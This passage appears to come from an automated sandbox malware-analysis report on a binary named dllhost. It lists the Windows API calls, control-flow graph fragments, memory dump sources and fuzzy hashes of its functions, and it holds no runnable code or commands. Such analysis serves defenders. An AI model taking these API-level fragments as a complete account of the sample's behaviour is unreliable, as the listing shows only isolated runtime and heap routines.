                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000290), ref: 00406222
                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 00406252
                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000040), ref: 00406270
                                                                                  • TlsAlloc.KERNEL32 ref: 004062E3
                                                                                  • TlsSetValue.KERNEL32(00000000), ref: 004062F7
                                                                                  • RtlAddVectoredExceptionHandler.NTDLL(00000000,004083E4), ref: 00406304
                                                                                  • RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 00406322
                                                                                  • TlsFree.KERNELBASE ref: 0040632E
                                                                                  • KiUserCallbackDispatcher.NTDLL(00000000,00000000,00000000,?,00000000), ref: 0040658E
                                                                                    • Part of subcall function 004089E4: CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000001,?,0040634F), ref: 004089ED
                                                                                    • Part of subcall function 00405FE4: GetTickCount.KERNEL32 ref: 00405FE4
                                                                                  • HeapDestroy.KERNELBASE(00000000), ref: 00406594
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$Alloc$CreateExceptionHandlerVectored$CallbackCompletionCountDestroyDispatcherFreePortRemoveTickUserValue
                                                                                  • String ID: {@
                                                                                  • API String ID: 277470114-1579578673
                                                                                  • Opcode ID: a252d9a9bbabb819f35d15b8839e444d3c8de345bd946ee0ddfb99abba457d68
                                                                                  • Instruction ID: 395f014a8140dccc6966b0a3a1c57690136f4d7ee00889256cdb175a7fd384a4
                                                                                  • Opcode Fuzzy Hash: a252d9a9bbabb819f35d15b8839e444d3c8de345bd946ee0ddfb99abba457d68
                                                                                  • Instruction Fuzzy Hash: 3AD1AD75A00218EFDB04DF98D985BADBBB1BF08315F15406AE806BB3A1D774AD91CF18

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • LoadIconW.USER32(?,00000001), ref: 00407C16
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00407C2F
                                                                                  • RegisterClassW.USER32(00000008), ref: 00407C49
                                                                                  • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00407C53
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00407C5A
                                                                                  • CreateWindowExW.USER32(00000080,0040933C,0040933C,80000000,00000000,00000000,0000012C,000000A9,00000000,00000000,?,00000000), ref: 00407C8D
                                                                                  • GetWindowRect.USER32(?,?), ref: 00407CBE
                                                                                  • MonitorFromWindow.USER32(?,00000002), ref: 00407CD0
                                                                                  • GetMonitorInfoW.USER32(00000000), ref: 00407CD7
                                                                                  • SetWindowPos.USER32(?,000000FF,?,00000001,000000FF,000000FF,00000041), ref: 00407D60
                                                                                  • ShowWindow.USER32(?,00000005), ref: 00407D6B
                                                                                  • LoadAcceleratorsW.USER32(?,00000001), ref: 00407D79
                                                                                  • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00407D98
                                                                                  • TranslateMessage.USER32(?), ref: 00407DA5
                                                                                  • DispatchMessageW.USER32(?), ref: 00407DB2
                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 00407DC2
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Load$HeapMessageMonitorTranslate$AcceleratorAcceleratorsAllocCallbackClassCreateCursorDispatchDispatcherFromIconInfoProcessRectRegisterShowUser
                                                                                  • String ID:
                                                                                  • API String ID: 3991283183-0
                                                                                  • Opcode ID: 9f61036d0e7f02a6a7ba6517aaf0fbfdc1e91730bf49ef7b523983749e8edbab
                                                                                  • Instruction ID: 5fe4f1e6764284e1476b4f887ecc18003e39f80d17944e0d46fd62ec5d74e65c
                                                                                  • Opcode Fuzzy Hash: 9f61036d0e7f02a6a7ba6517aaf0fbfdc1e91730bf49ef7b523983749e8edbab
                                                                                  • Instruction Fuzzy Hash: CB512A71A0021AAFDF00DFA8DD48AAEBBB9FF48310F148125F605F7291D774A945CB94

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetVersion.KERNEL32 ref: 00401026
                                                                                    • Part of subcall function 00403B48: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040105E,00000001), ref: 00403B59
                                                                                    • Part of subcall function 00403B48: HeapDestroy.KERNEL32 ref: 00403B98
                                                                                  • GetCommandLineA.KERNEL32 ref: 00401086
                                                                                  • GetStartupInfoA.KERNEL32(?), ref: 004010B1
                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004010D4
                                                                                    • Part of subcall function 00404890: ExitProcess.KERNEL32 ref: 004048AD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                  • String ID:
                                                                                  • API String ID: 2057626494-0
                                                                                  • Opcode ID: 446b7fcb8fcb92790f71322ff8387f25dfb74f1e11fa9a61e5eee6a62c75f59e
                                                                                  • Instruction ID: 091a06186873a18e525cd289e51ac515907a6106f624eaab6d6e2ea4d711997a
                                                                                  • Opcode Fuzzy Hash: 446b7fcb8fcb92790f71322ff8387f25dfb74f1e11fa9a61e5eee6a62c75f59e
                                                                                  • Instruction Fuzzy Hash: 7721D2F1900745AADB04AFB59D06B6E7BB8AB44705F10443FF601BB2E2DB788940CA5D

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 140 4047d4-4047e3 call 403f38 143 4047e5-4047f0 GetCurrentProcess TerminateProcess 140->143 144 4047f6-40480c 140->144 143->144 145 40484a-40485e call 403bbc 144->145 146 40480e-404815 144->146 155 404860-404866 call 404564 145->155 156 404867-404871 ExitProcess 145->156 148 404817-404823 146->148 149 404839-404849 call 403bbc 146->149 152 404825-404829 148->152 153 404838 148->153 149->145 157 40482b 152->157 158 40482d-404836 152->158 153->149 157->158 158->152 158->153
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(?,?,00404889,?,00000000,00000000,004010E9,00000000,00000000), ref: 004047E9
                                                                                  • TerminateProcess.KERNEL32(00000000,?,00404889,?,00000000,00000000,004010E9,00000000,00000000), ref: 004047F0
                                                                                  • ExitProcess.KERNEL32 ref: 00404871
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 1703294689-0
                                                                                  • Opcode ID: ad8cc25982e85b102fcf734b02b4049def137bff0af21db10ca1abc7b14d613d
                                                                                  • Instruction ID: 462893b16460747d6fcfe72fcdd75f783e50c19e3ae09171eda3095d480ad325
                                                                                  • Opcode Fuzzy Hash: ad8cc25982e85b102fcf734b02b4049def137bff0af21db10ca1abc7b14d613d
                                                                                  • Instruction Fuzzy Hash: 9401A9B2D04341AAD620AF65FC4561A7BA4ABC0756B10843FF940B31E2D778DD49C61E

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 161 403b48-403b66 HeapCreate 162 403b68-403b75 call 4023bc 161->162 163 403b9e-403ba0 161->163 166 403b84-403b87 162->166 167 403b77-403b82 call 403470 162->167 169 403ba1-403ba4 166->169 170 403b89 call 402a90 166->170 173 403b8e-403b90 167->173 170->173 173->169 174 403b92-403b98 HeapDestroy 173->174 174->163
                                                                                  APIs
                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040105E,00000001), ref: 00403B59
                                                                                    • Part of subcall function 004023BC: GetVersionExA.KERNEL32 ref: 004023DB
                                                                                  • HeapDestroy.KERNEL32 ref: 00403B98
                                                                                    • Part of subcall function 00403470: HeapAlloc.KERNEL32(00000000,00000140,00403B81,000003F8), ref: 0040347D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocCreateDestroyVersion
                                                                                  • String ID:
                                                                                  • API String ID: 2507506473-0
                                                                                  • Opcode ID: 7eef139956fc6b6503d22f50377ba22f9a0d4510e9bed10b0cab0d45bef97551
                                                                                  • Instruction ID: 38e43db576a1c1f139e2ce340b371da4423acca777513b2ecda9cd47fb161bbd
                                                                                  • Opcode Fuzzy Hash: 7eef139956fc6b6503d22f50377ba22f9a0d4510e9bed10b0cab0d45bef97551
                                                                                  • Instruction Fuzzy Hash: 26F06C70615241AADF605F715D4A76539A8974075FF10443BF901E41E2FBBC9A80D51E

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 175 401cf8-401d23 176 401d25-401d2e 175->176 177 401d68-401d6b 175->177 178 401d34-401d58 call 403e20 call 402c5c call 401d5f 176->178 179 401dc7-401dcc 176->179 177->179 180 401d6d-401d72 177->180 178->179 200 401d5a 178->200 182 401dd1-401dd6 179->182 183 401dce-401dd0 179->183 184 401d74-401d7a 180->184 185 401d7c-401d7e 180->185 187 401dd7-401ddf RtlAllocateHeap 182->187 183->182 188 401d7f-401d88 184->188 185->188 192 401de5-401df3 187->192 189 401db8-401db9 188->189 190 401d8a-401db6 call 403e20 call 402600 call 401dbe 188->190 189->187 190->189 190->192 200->192
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 00401DDF
                                                                                    • Part of subcall function 00403E20: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0040192E,00000009,00000000,00000000,00000001,00403B05,00000001,00000074,?,?,00000000,00000001), ref: 00403E5D
                                                                                    • Part of subcall function 00403E20: EnterCriticalSection.KERNEL32(?,?,?,0040192E,00000009,00000000,00000000,00000001,00403B05,00000001,00000074,?,?,00000000,00000001), ref: 00403E78
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$AllocateEnterHeapInitialize
                                                                                  • String ID:
                                                                                  • API String ID: 1616793339-0

                                                                                  APIs
                                                                                  • CloseHandle.KERNELBASE(?,0040657A), ref: 00408BED
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2962429428-0

                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,0040206C,?,Microsoft Visual C++ Runtime Library,00012010,?,00409484,?,004093AC,?,?,?,Runtime Error!Program: ), ref: 00402322
                                                                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040233A
                                                                                  • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0040234B
                                                                                  • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00402358
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                  • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                  • API String ID: 2238633743-4044615076

                                                                                  APIs
                                                                                  • LCMapStringW.KERNEL32(00000000,00000100,0040937C,00000001,00000000,00000000,74DEE860,0046302C,?,?,?,00405455,?,?,?,00000000), ref: 0040127E
                                                                                  • LCMapStringA.KERNEL32(00000000,00000100,004091E4,00000001,00000000,00000000,?,?,00405455,?,?,?,00000000,00000001), ref: 0040129A
                                                                                  • LCMapStringA.KERNEL32(?,?,?,UT@,?,?,74DEE860,0046302C,?,?,?,00405455,?,?,?,00000000), ref: 004012E3
                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,UT@,00000000,00000000,74DEE860,0046302C,?,?,?,00405455,?,?,?,00000000), ref: 0040131B
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,00405455,?,?,?,00000000,00000001), ref: 00401373
                                                                                  • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,00405455,?,?,?,00000000,00000001), ref: 00401389
                                                                                  • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,00405455,?,?,?,00000000,00000001), ref: 004013BC
                                                                                  • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,00405455,?,?,?,00000000,00000001), ref: 00401424
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: String$ByteCharMultiWide
                                                                                  • String ID: ,0F$UT@
                                                                                  • API String ID: 352835431-2878614304

                                                                                  APIs
                                                                                  • GetStringTypeW.KERNEL32(00000001,0040937C,00000001,?,74DEE860,0046302C,?,?,00405455,?,?,?,00000000,00000001), ref: 0040149F
                                                                                  • GetStringTypeA.KERNEL32(00000000,00000001,004091E4,00000001,?,?,00405455,?,?,?,00000000,00000001), ref: 004014B9
                                                                                  • GetStringTypeA.KERNEL32(?,?,?,?,UT@,74DEE860,0046302C,?,?,00405455,?,?,?,00000000,00000001), ref: 004014ED
                                                                                  • MultiByteToWideChar.KERNEL32(?,,0F,?,?,00000000,00000000,74DEE860,0046302C,?,?,00405455,?,?,?,00000000,00000001), ref: 00401525
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00405455,?), ref: 0040157B
                                                                                  • GetStringTypeW.KERNEL32(?,?,00000000,UT@,?,?,?,?,?,?,00405455,?), ref: 0040158D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: StringType$ByteCharMultiWide
                                                                                  • String ID: ,0F$UT@
                                                                                  • API String ID: 3852931651-2878614304

                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 00401FB5
                                                                                  • GetStdHandle.KERNEL32(000000F4,00409484,00000000,00000000,00000000,?), ref: 0040208B
                                                                                  • WriteFile.KERNEL32(00000000), ref: 00402092
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$HandleModuleNameWrite
                                                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                  • API String ID: 3784150691-4022980321

                                                                                  APIs
                                                                                  • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00401096), ref: 004021F7
                                                                                  • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00401096), ref: 0040220B
                                                                                  • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00401096), ref: 00402237
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00401096), ref: 0040226F
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00401096), ref: 00402291
                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00401096), ref: 004022AA
                                                                                  • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00401096), ref: 004022BD
                                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004022FB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 1823725401-0
                                                                                  • Opcode ID: 1b02f493154be9ba70f699b67ef859cde770e8d656882e3c1aa63c91b7e72620
                                                                                  • Instruction ID: 01933e7cb5bb143a36eec717e07290e85ced864bd21ce10d6bfd835e533edd1a
                                                                                  • Opcode Fuzzy Hash: 1b02f493154be9ba70f699b67ef859cde770e8d656882e3c1aa63c91b7e72620
                                                                                  • Instruction Fuzzy Hash: 7D3104B25042256FE7207BB49ECC83B769CE68930471505BFF952F32D1E6B98C8186BD
                                                                                  APIs
                                                                                  • GetStartupInfoA.KERNEL32(?), ref: 00403C36
                                                                                  • GetFileType.KERNEL32(?,?,00000000), ref: 00403CE1
                                                                                  • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 00403D44
                                                                                  • GetFileType.KERNEL32(00000000,?,00000000), ref: 00403D52
                                                                                  • SetHandleCount.KERNEL32 ref: 00403D89
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileHandleType$CountInfoStartup
                                                                                  • String ID: @0F
                                                                                  • API String ID: 1710529072-3475146372
                                                                                  • Opcode ID: c4909c97a1fd72e1e228d0010ea8ace08c4a8341c2f9480f19021213b8196bd7
                                                                                  • Instruction ID: 28a553a9637121220ee7247c65834bb0b9772ccf18777b3abf87fb485a1a5954
                                                                                  • Opcode Fuzzy Hash: c4909c97a1fd72e1e228d0010ea8ace08c4a8341c2f9480f19021213b8196bd7
                                                                                  • Instruction Fuzzy Hash: 0C5148719042418BD720CF28C8847263FA8AF1272AF28467EC592FB3E1E738CE45C759
                                                                                  APIs
                                                                                  • GetVersionExA.KERNEL32 ref: 004023DB
                                                                                  • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00402410
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402470
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                  • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                  • API String ID: 1385375860-4131005785
                                                                                  • Opcode ID: 82d2434ca4891ad27d0855a263d5e3d4dffc660e015b2eb8e909bd98dd4d4f92
                                                                                  • Instruction ID: d88cb298004c66bfd347c1fe4df28c0533db6c8754958dd86b1fd33aef8941e5
                                                                                  • Opcode Fuzzy Hash: 82d2434ca4891ad27d0855a263d5e3d4dffc660e015b2eb8e909bd98dd4d4f92
                                                                                  • Instruction Fuzzy Hash: D8314A719012486DEF3196709E997DF37689B02304F2440FBD549F62D2D6BD8E89CB19
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00000103,7FFFFFFF,0040378D,004053B3,00000000,?,?,00000000,00000001), ref: 00403AE2
                                                                                  • TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 00403AF0
                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 00403B3C
                                                                                    • Part of subcall function 00401878: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,00403B05,00000001,00000074,?,?,00000000,00000001), ref: 0040196E
                                                                                  • TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 00403B14
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00403B25
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastValue$AllocCurrentHeapThread
                                                                                  • String ID:
